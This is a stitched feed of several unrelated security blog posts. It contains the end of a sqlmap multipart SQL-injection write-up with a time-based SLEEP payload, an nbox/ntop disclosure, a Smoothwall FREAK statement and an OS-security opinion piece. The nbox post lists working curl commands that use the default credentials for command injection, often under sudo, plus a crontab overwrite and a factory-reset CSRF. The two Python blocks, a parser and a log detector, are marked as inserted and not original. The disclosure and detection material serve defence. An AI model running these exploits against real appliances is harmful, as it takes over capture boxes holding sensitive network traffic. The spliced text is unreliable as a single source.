 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2
 
 Content-Disposition: form-data; name="Person_create"
 
 Add Person
 ------WebKitFormBoundaryi8tNoAS0tr0R3KR2-----
 [11:40:15] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux Debian 8.0 (jessie)
 web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.12
 
 [11:40:15] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
 [*] shutting down at 11:40:15

Above, the SQLmap output confirms that our injection point is exploitable.
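The PHP loop above interpolates each array element straight into the query, and the multipart encoding is only a transport detail: once PHP has parsed the body, `Person[Person_name]` is just another `$_POST` value. The following Python example is added here and is not code from the original post; it shows the same data path on the defensive side: a small multipart/form-data parser, the bracket-name grouping that `$_POST` performs, and the two checks the loop lacks (an allowlist that only accepts numeric ids, and a parameterized query). The request body is constructed for the example, with the boundary and field names from the capture above and the time-based payload SQLmap reported; `v_entry` is stood in for by an in-memory sqlite table with made-up rows.

```python
import re
import sqlite3
from typing import Any, Dict, List

# Constructed sample request body, modelled on the multipart capture above.
# Boundary and field names match the page; the values are made up, and the
# first field carries the time-based payload that sqlmap reported.
BOUNDARY = "----WebKitFormBoundaryi8tNoAS0tr0R3KR2"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="Person[Person_name]"\r\n\r\n'
    "1 AND (SELECT * FROM (SELECT(SLEEP(5)))GrGB)\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="Person[Person_contact]"\r\n\r\n'
    "1\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="Person_create"\r\n\r\n'
    "Add Person\r\n"
    f"--{BOUNDARY}--\r\n"
)


def parse_multipart(body: str, boundary: str) -> Dict[str, str]:
    """Split a multipart/form-data body into {field name: value}."""
    fields: Dict[str, str] = {}
    for part in body.split(f"--{boundary}"):
        if part == "" or part.startswith("--"):
            continue                      # preamble or the closing delimiter
        if part.startswith("\r\n"):
            part = part[2:]               # CRLF that follows the boundary line
        headers, _, value = part.partition("\r\n\r\n")
        if value.endswith("\r\n"):
            value = value[:-2]            # CRLF that precedes the next boundary
        match = re.search(r'name="([^"]*)"', headers)
        if match:
            fields[match.group(1)] = value
    return fields


def expand_php_arrays(fields: Dict[str, str]) -> Dict[str, Any]:
    """Group names such as Person[Person_name] the way PHP's $_POST does."""
    expanded: Dict[str, Any] = {}
    for name, value in fields.items():
        match = re.fullmatch(r"([^\[\]]+)\[([^\[\]]*)\]", name)
        if match:
            expanded.setdefault(match.group(1), {})[match.group(2)] = value
        else:
            expanded[name] = value
    return expanded


def validate_ids(values: Dict[str, str]) -> List[int]:
    """Accept only plain decimal ids; anything else is rejected before any SQL runs."""
    ids: List[int] = []
    for key, value in values.items():
        if not re.fullmatch(r"[0-9]{1,10}", value):
            raise ValueError(f"{key}: expected a numeric id, got {value!r}")
        ids.append(int(value))
    return ids


def lookup_entries(conn: sqlite3.Connection, ids: List[int]) -> List[tuple]:
    """Parameterized counterpart of the string-built query in the PHP loop."""
    rows: List[tuple] = []
    for vdbid in ids:
        rows.extend(conn.execute("SELECT * FROM v_entry WHERE vdbid = ?", (vdbid,)))
    return rows


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the v_entry table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE v_entry (vdbid INTEGER, label TEXT)")
    conn.executemany("INSERT INTO v_entry VALUES (?, ?)", [(1, "one"), (2, "two")])
    return conn


def handle_request(body: str, boundary: str) -> str:
    """Return 'rejected: ...' for a non-numeric id, else the labels found."""
    person = expand_php_arrays(parse_multipart(body, boundary)).get("Person", {})
    try:
        ids = validate_ids(person)
    except ValueError as err:
        return f"rejected: {err}"
    rows = lookup_entries(demo_db(), ids)
    return "ok: " + ", ".join(label for _, label in rows)


if __name__ == "__main__":
    print(handle_request(SAMPLE_BODY, BOUNDARY))
```

Either check on its own would have stopped the injection above; the allowlist is the cheaper one to add to legacy code such as this, and the placeholder query is the one that keeps working when the column later stops being numeric.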

Conclusion

As a vulnerability researcher, I run across all sorts of interesting code and ways to exploit it. It’s always a learning experience, which is one of the reasons why I try to spend some time each week hunting for bugs. I enjoy the discovery and exploitation while learning new things along the way.

The post Sql Injection using SQLmap with multipart/form-data Encoding appeared first on Liquidmatrix Security Digest.

Got any RCEs?

Security is a boomin’, and so there are many different appliances to protect your network. Some of them do very little to protect, some of them open new holes in your network.

In line with best practice, many Security teams capture all network traffic using a variety of solutions, some closed, some open source. Once the traffic is stored, it can be used to detect badness, or just examine traffic patterns on corporate assets.

One of these open source options is NTOP, which of course has an appliance version, called nbox recorder. It goes without saying that if this traffic data were to be exposed, the consequences could be catastrophic: consider stored credentials, authentication data, PII, internal data leakage...

(image: pcap_tee.png, captioned "PCAP or it didn't happen")

You can either buy a ready-to-go appliance or, with some drudge work, build your own: get a license for nbox and install it on a Linux box. ntop is nice like that, providing all the repositories, and the steps are simple and easy to follow. Just spin up an Ubuntu VM and run:

wget http://apt.ntop.org/14.04/all/apt-ntop.deb
sudo dpkg -i apt-ntop.deb
sudo apt-get clean all
sudo apt-get update
sudo apt-get install -y pfring nprobe ntopng ntopng-data n2disk cento nbox

BOOM! You are ready to go. Now you have a nbox recorder ready to be used. And abused!
The default credentials are nbox/nbox and it does use Basic Auth to be accessed.

Before I continue, imagine that you have this machine capturing all the traffic of your network. Listening to all your corporate communications or production traffic and storing them on disk. How bad would it be if an attacker gets full access to it? Take a minute to think about it.


(image: nervs.gif, captioned "Uh-oh...")

This level of exposure caught my eye, and I wanted to verify that having one of these sitting in your network does not make you more exposed. Unfortunately, I found several issues that could have been catastrophic in the hands of someone with malicious intent.

I do believe in the responsible disclosure process, however after repeatedly notifying both ntop and MITRE, these issues were not given high priority nor visibility. The following table details the timeline around my disclosure communications: 

Disclosure Timeline

12/27/2014 - Sent to ntop details about some nbox vulnerabilities discovered in version 2.0
01/15/2015 - Asked ntop for an update about the vulnerabilities sent
01/16/2015 - ntop requested the details again, stating they may have been fixed
01/18/2015 - Sent the vulnerability details for a second time. Mentioned that CVEs should be requested
05/24/2015 - Asked ntop for an update about the vulnerabilities sent and to request CVEs
01/06/2016 - Noticed new nbox version is out (2.3) and found more vulnerabilities. Old vulnerabilities are fixed. Sent ntop an email about new issues and to request CVEs
01/06/2016 - Quick answer ignoring my request for CVEs and just asking for vulnerabilities details.
01/28/2016 - Sent request for CVEs to MITRE, submitting a full report with all the issues and steps to reproduce.
02/17/2016 - Asked MITRE for an update on the issues submitted.
02/17/2016 - Reply from MITRE: “Your request is outside the scope of CVE's published priorities. As such, it will not be assigned a CVE-ID by MITRE or another CVE CNA at this time.”

07/10/2016 - Noticed new nbox version (2.5) with partial fixes for some vulnerabilities in the previous (2.3) version

The ntop team initially refused to comment and silently fixed the bugs. MITRE then said this wasn't severe enough to warrant a CVE. As such, I have now chosen to highlight the issues here in an effort to have them remediated. I again want to highlight that I take this process very seriously, but after consulting with multiple other individuals, I feel that both the ntop team and MITRE have left me no other responsible options.
(image: neotrain1.jpg, captioned "Here comes the pain train!")

*Replace NTOP-BOX with the IP address of your appliance (presuming that you are already logged in). Note that most of the RCEs are wrapped in sudo, which makes the pwnage much more interesting:


RCE: POST against https://NTOP-BOX/ntop-bin/write_conf_users.cgi with parameter cmd=touch /tmp/HACK

curl -sk --user nbox:nbox --data 'cmd=touch /tmp/HACK' 'https://NTOP-BOX/ntop-bin/write_conf_users.cgi'


RCE: POST against https://NTOP-BOX/ntop-bin/rrd_net_graph.cgi with parameters interface=;touch /tmp/HACK;


curl -sk --user nbox:nbox --data 'interface=;touch /tmp/HACK;' 'https://NTOP-BOX/ntop-bin/rrd_net_graph.cgi'


RCE (Wrapped in sudo): GET https://NTOP-BOX/ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap


curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap'


RCE (Wrapped in sudo): GET https://NTOP-BOX/ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi&params=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22


curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi&params=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22'

RCE: POST against https://NTOP-BOX/ntop-bin/do_mergecap.cgi with parameters opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit%200

curl -sk --user nbox:nbox --data 'opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit 0' 'https://NTOP-BOX/ntop-bin/do_mergecap.cgi'

There are some other interesting things. For example, it was possible to get a persistent XSS by rewriting the crontab with an XSS payload in it, but they fixed that in 2.5. However, the crontab overwrite (wrapped in sudo) is still possible:

GET https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON

curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON'

The last one is a CSRF that leaves the machine fried by resetting it completely:

GET https://NTOP-BOX/ntop-bin/do_factory_reset.cgi

curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_factory_reset.cgi'


To make things easier, I created a Vagrantfile with provisioning so you can have your own nbox appliance and test my findings or give it a shot. There is more stuff to be found, trust me :)


And you can run the checker.sh to check for all the above attacks. Pull requests are welcome if you find more!
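Every GET variant above leaves its payload in the appliance's own web server access log, which is where a defender can spot abuse of these CGIs long before a fix ships. The following Python example is added here and is not part of the original post or of the nbox project; it decodes each request to /ntop-bin/, flags query parameters carrying shell metacharacters (the pattern behind the pcap_upload.cgi and sudowrapper.cgi issues) and flags any hit on the factory-reset and crontab endpoints, whose mere invocation changes the box. The log lines are constructed in Apache combined format around the endpoints named above; the source addresses, timestamps and user agents are made up. POST bodies (the write_conf_users.cgi, rrd_net_graph.cgi and do_mergecap.cgi cases) are not in a standard access log, so catching those needs body logging or the full-packet capture the appliance itself keeps.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (Apache combined format). Request paths reuse
# the nbox endpoints from the write-up; hosts, times and agents are invented.
SAMPLE_LOG = """\
10.0.0.5 - nbox [26/Jul/2016:10:00:01 +0000] "GET /ntop-bin/index.cgi HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - nbox [26/Jul/2016:10:00:07 +0000] "GET /ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap HTTP/1.1" 200 312 "-" "curl/7.47.0"
10.0.0.9 - nbox [26/Jul/2016:10:00:09 +0000] "GET /ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi&params=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22 HTTP/1.1" 200 118 "-" "curl/7.47.0"
10.0.0.9 - nbox [26/Jul/2016:10:00:12 +0000] "POST /ntop-bin/rrd_net_graph.cgi HTTP/1.1" 200 2048 "-" "curl/7.47.0"
10.0.0.9 - nbox [26/Jul/2016:10:00:15 +0000] "GET /ntop-bin/do_factory_reset.cgi HTTP/1.1" 200 64 "-" "curl/7.47.0"
10.0.0.5 - nbox [26/Jul/2016:10:01:00 +0000] "GET /ntop-bin/rrd_net_graph.cgi?interface=eth0 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that let a parameter value break out of a shell command line
# that a CGI script builds around it.
SHELL_META = re.compile(r"[;|&`$]")

# Endpoints whose mere invocation changes the box (from the write-up above).
SENSITIVE = {"/ntop-bin/do_factory_reset.cgi", "/ntop-bin/do_crontab.cgi"}

Finding = Tuple[str, str, str]   # (rule, source address, path)


def analyze_line(line: str) -> List[Finding]:
    """Return the findings for one access-log line (empty if it looks benign)."""
    match = LOG_RE.match(line)
    if not match:
        return []
    url = urlsplit(match["target"])
    if not url.path.startswith("/ntop-bin/"):
        return []
    findings: List[Finding] = []
    # parse_qsl splits on '&' first and URL-decodes each value afterwards, so a
    # literal '&' inside one value is inspected without flagging every multi-
    # parameter query.
    for _name, value in parse_qsl(url.query, keep_blank_values=True):
        if SHELL_META.search(value):
            findings.append(("shell-metachar-in-query", match["src"], url.path))
            break
    if url.path in SENSITIVE:
        findings.append(("sensitive-admin-cgi", match["src"], url.path))
    return findings


def analyze_log(text: str) -> List[Finding]:
    """Run analyze_line over every non-empty line of a log excerpt."""
    findings: List[Finding] = []
    for line in text.splitlines():
        if line.strip():
            findings.extend(analyze_line(line))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per rule, which is what an alert threshold would key on."""
    counts: Dict[str, int] = {}
    for rule, _src, _path in findings:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    for rule, src, path in analyze_log(SAMPLE_LOG):
        print(f"{rule:25} {src:10} {path}")
    print(summarize(analyze_log(SAMPLE_LOG)))
```

The metacharacter rule is deliberately narrow (only requests under /ntop-bin/, only decoded parameter values), so it stays quiet on normal ntop traffic; the interface=eth0 request passes. Anything it does flag is worth a look regardless of the nbox version, and the sensitive-endpoint rule is the one to page on, since a factory reset is not something a capture appliance should be doing from an unattended request.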

(The issues were found originally in nbox 2.3 and confirmed in nbox 2.5)

Modules for metasploit and BeEF will come soon. I hope this time the issues are not just silently patched...

If you have any questions or feedback, hit me up on twitter (@javutin)!

Have a nice day!


Statement: Smoothwall and the "FREAK" Vulnerability

In light of the recent "FREAK" vulnerability, in which web servers and web browsers can be cajoled into using older, more vulnerable ciphers in encrypted communications, we would like to assure customers that the web server configuration on an up-to-date Smoothwall system is not vulnerable to this attack.

Similarly, if you are using "HTTPS Decrypt & Inspect" in Smoothwall, your clients' browsers will be afforded some protection from attack, as their traffic will be re-encrypted by the web filter, which does not support downgrading to these "Export Grade" ciphers.

Which operating system is the most secure? Four points to remember.

No, you are almost certainly wrong if you tried to guess. A recent study shows that products from Apple actually are at the top when counting vulnerabilities, and that means at the bottom security-wise. Just counting vulnerabilities is not a very scientific way to measure security, and there is a debate over how to interpret the figures. But this is anyway a welcome eye-opener that helps kill old myths.

Apple for a long time stubbornly denied security problems, and their marketing succeeded in building an image of security. Meanwhile Windows was the biggest and most malware-targeted system. Microsoft rolled up its sleeves and fought at the frontline against viruses and vulnerabilities. Their reputation suffered, but Microsoft gradually improved its security and built an efficient process for patching security holes. Microsoft had what is most important in security: the right attitude. Apple didn’t, and the recent vulnerability study shows the result.

Here are four points for people who want to select a secure operating system.

  • Forget reputation when thinking security. Windows used to be bad and nobody really cared to attack Apple’s computers before they became popular. The old belief that Windows is unsafe and Apple is safe is just a myth nowadays.
  • There is malware on almost all commonly used platforms. Windows Phone is the only exception with practically zero risk. Windows and Android are the most common systems and malware authors target them most. So the need for an anti-malware product is naturally bigger on these systems. But the so-called antivirus products of today are actually broad security suites. They protect against spam and harmful web sites too, just to mention some examples. So chances are that you want a security product anyway, even if your system isn’t one of the main malware targets.
  • So which system is most secure? It’s the one that is patched regularly. All the major systems, Windows, OS X and Linux, have sufficient security for a normal private user. But they will all become unsafe if the security updates are neglected. So security is not really a selection criterion for ordinary people.
  • Mobile devices, phones and tablets, generally have a more modern system architecture and a safer software distribution process. Do you have to use a desktop or laptop, or can you switch to a tablet? Dumping the big old-school devices is a way to improve security. Could it work for you?

So all this really boils down to the fact that you can select any operating system you like and still be reasonably safe. There are some differences, but they are more about old-school versus new-school devices, not about Apple versus Microsoft versus Linux. Also remember that your own behavior affects security more than your choice of device, and that you are never 100% safe no matter what you do.


Safe surfing,
Micke


Added February 27th. Yes, this controversial study has indeed stirred a heated debate, which isn’t surprising at all. Here’s an article defending Apple. It has flaws and represents a very limited view of security, but one of its important points still stands. If someone still thinks Apple is immortal and invincible, it’s time to wake up. And naturally, this whole debate is totally meaningless for ordinary users. Just keep patching what you have and you will be fine. 🙂 Thanks to Jussi (and others) for feedback.